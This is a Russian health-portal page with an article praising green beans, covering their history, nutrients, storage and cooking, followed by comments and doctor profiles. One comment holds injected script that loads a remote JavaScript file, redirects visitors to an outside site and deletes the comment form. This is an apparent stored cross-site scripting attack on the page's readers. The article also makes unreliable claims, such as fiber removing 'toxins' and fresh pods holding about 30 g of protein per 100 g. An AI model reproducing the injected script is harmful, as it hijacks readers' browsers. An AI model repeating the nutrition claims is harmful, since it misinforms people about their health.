Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Зеленая фасоль. Отрада дл...  >>  Зеленая фасоль. Отрада для кишечника и не только
 
Обратная связь
 

Зеленая фасоль. Отрада для кишечника и не только

Размер шрифта
20 ноября 2016 00:00
  • google_analytics: false
  • Нравится

Долгое время родиной стручковой фасоли считалась Южная Америка. Однако нашлись подтверждения того, что похрустеть фасолью любили и в Древнем Китае. Точно известно лишь то, что в Европу фасоль попала в 16 веке из Америки. Чем же она покорила Старый Свет?

Фасоль

Во-первых, своей красотой. Стручковую фасоль выращивали в Европе для украшения. Вьющаяся лиана с душистыми цветами украшала сады и дворики вельмож. В 18 веке кулинары стали использовать зерна фасоли, а спустя некоторое время итальянцы вывели специальный сорт фасоли, стручки которой были особенно нежными и вкусными.

Чем так хороша стручковая фасоль?

  1. Источник растительного белка

Зеленая фасоль, как и все бобовые – источник растительного белка, строительного материала для мышц. Фасоль примерно на треть состоит из растительного белка. Он легко усваивается и может заменять белок животного происхождения.

  1. Грубые волокна

Стручковая фасоль богата клетчаткой. Грубые волокна не перевариваются в кишечнике и работают, как щетка. Они «выметают» из кишечника все токсины и излишки жира, формируя пищевой комок. Зеленая фасоль – прекрасное средство от запоров.

  1. Микроэлементы и витамин К

Если вы решили похудеть, ведите в рацион стручковую фасоль. В ней минимум жиров и углеводов и достаточно белка. Там много калия и магния – микроэлементов, которые отвечают за работу сердечной мышцы. Они защищают от аритмий и образования тромбов в сосудах.

Фасоль богата витамином К. Он необходим для нормального свертывания крови и предупреждает внутренние кровоизлияния.

Кальций, содержащийся в фасоли, делает наши кости прочными и защищает от их разрушения.

Пьедестал почета по количеству белка

1

1. Бурая фасоль (30 г на 100 г)
2. Зеленая фасоль (28-30 г на 100 г)
3. Белая фасоль (21 г на 100 г)

Как выбрать

При выборе стручковой фасоли нужно обратить внимание на ее цвет: стручки должны быть ярко-зелеными, без коричневых пятен. Если стручок сломать пополам, он должен хрустнуть, а не согнуться.

Как хранить

В замороженной фасоли есть все полезные качества. Но сначала ее нужно подготовить к заморозке. Для этого у свежих стручков фасоли обрежьте кончики, нарежьте стручки пополам. Затем фасоль нужно бланшировать: отварить в подсоленной воде в течение 2 минут. Выложите на салфетку и высушите, переложите в контейнеры и уберите в морозильную камеру.

И еще один маленький секрет. Чтобы стручки фасоли оставались ярко-зелеными, после бланширования их следует выбросить на лед, а затем высушить салфетками.

Если вы не планируете хранить свежую фасоль, промойте ее, высушите, положите в вакуумный контейнер и уберите в холодильник. В таком виде фасоль может храниться около недели.

Как готовить

Из свежей фасоли можно приготовить салат или сделать из нее гарнир к горячим блюдам. Для этого стручковую фасоль надо отварить в течение 5-7 минут, полить оливковым маслом, добавить мелко нарубленный чеснок и украсить тертым сыром.

Видеосюжеты по теме:

Зеленая фасоль. Отрада для кишечника и не только

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.